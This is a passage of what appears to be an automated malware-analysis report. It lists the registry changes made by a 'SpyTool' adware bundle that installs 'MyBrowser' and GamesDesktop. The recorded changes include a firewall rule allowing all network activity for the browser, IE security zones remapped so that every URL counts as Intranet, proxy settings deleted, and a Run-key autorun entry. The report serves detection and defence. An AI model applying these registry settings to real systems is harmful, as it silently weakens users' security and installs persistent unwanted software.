[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"
The process nsy18.tmp:1632 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 E5 5F F8 51 FF CD DB 7D 18 C7 DD 0B 58 F9 FD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nsn4.tmp:224 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 52 67 B3 13 FA 3C C7 6C 2E C8 B8 5D 0C B7 AE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process taskkill.exe:1632 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E B3 0E 2E C3 E4 76 9F F4 34 AD CA F1 C8 79 1E"
The process taskkill.exe:484 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 1B 47 AD A6 29 70 52 2C 75 94 73 42 30 B9 90"
The process taskkill.exe:220 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D DB 84 08 5D C2 1C 44 6A 9B 19 17 18 8F 57 B4"
The process wmic.exe:1524 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 F0 46 BA 55 05 15 B7 CC 02 54 A1 69 DC A2 6E"
The process amisid.exe:224 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "C8318CA6891F5119A9FD96EC19E98D71"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 E7 EF DF E0 7F 95 AF 48 C6 2C F0 EA 56 FE 44"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process amisid.exe:1228 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 E9 2F 99 2D 79 C2 69 E4 71 36 7B 7F 44 0D E4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCU\Software\InternetTurbo]
"UID" = "C8318CA6891F5119A9FD96EC19E98D71"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process nsp1D.tmp:1376 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 40 F2 F2 65 3C 93 4C 8A FE 2F 9C 6A B2 AA 6E"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process %original file name%.exe:1704 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 8A E3 BE 05 FC 1D E4 80 57 0F C4 08 B6 F8 85"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsd3C.tmp:1776 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 94 49 0A 54 D9 B8 1C CE 5C 0D 1A F9 76 8E 8B"
The process nsd3C.tmp:848 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Tutorials\updv]
"Version" = "15.09.06"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"NoRepair" = "1"
"Publisher" = "GAMESDESKTOP"
"Inno Setup: Setup Version" = "5.5.5 (a)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"InstallLocation" = "%Program Files%\gmsd_re_005010082\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"QuietUninstallString" = "%Program Files%\gmsd_re_005010082\unins000.exe /SILENT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"InstallDate" = "20150907"
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"DisplayName" = "GamesDesktop 092.005010082"
[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""
[HKCU\Software\TutoTag]
"OnceInstalled" = "re"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010082]
"PathInstall" = "%Program Files%\gmsd_re_005010082"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"URLUpdateInfo" = "http://re.gamesdesktop.com"
[HKCU\Software\Microsoft]
"Tinstalls" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"Inno Setup: User" = "%CurrentUserName%"
"Inno Setup: Icon Group" = "GAMESDESKTOP"
[HKCU\Software\Microsoft\Tinstalls]
"20150907" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010082"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D EE CC 19 15 56 89 9F DE C9 04 27 1C 99 46 CA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"HelpLink" = "http://re.gamesdesktop.com"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010082\unins000.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"Inno Setup: Language" = "re"
"URLInfoAbout" = "http://re.gamesdesktop.com"
[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
"OnceInstalled2" = "re"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010082" = "%Program Files%\gmsd_re_005010082\gmsd_re_005010082.exe"
The SpyTool deletes the following registry key(s):
[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
The process 2835.exe:792 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3290]
"setup.exe" = "MyBrowser Installer"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
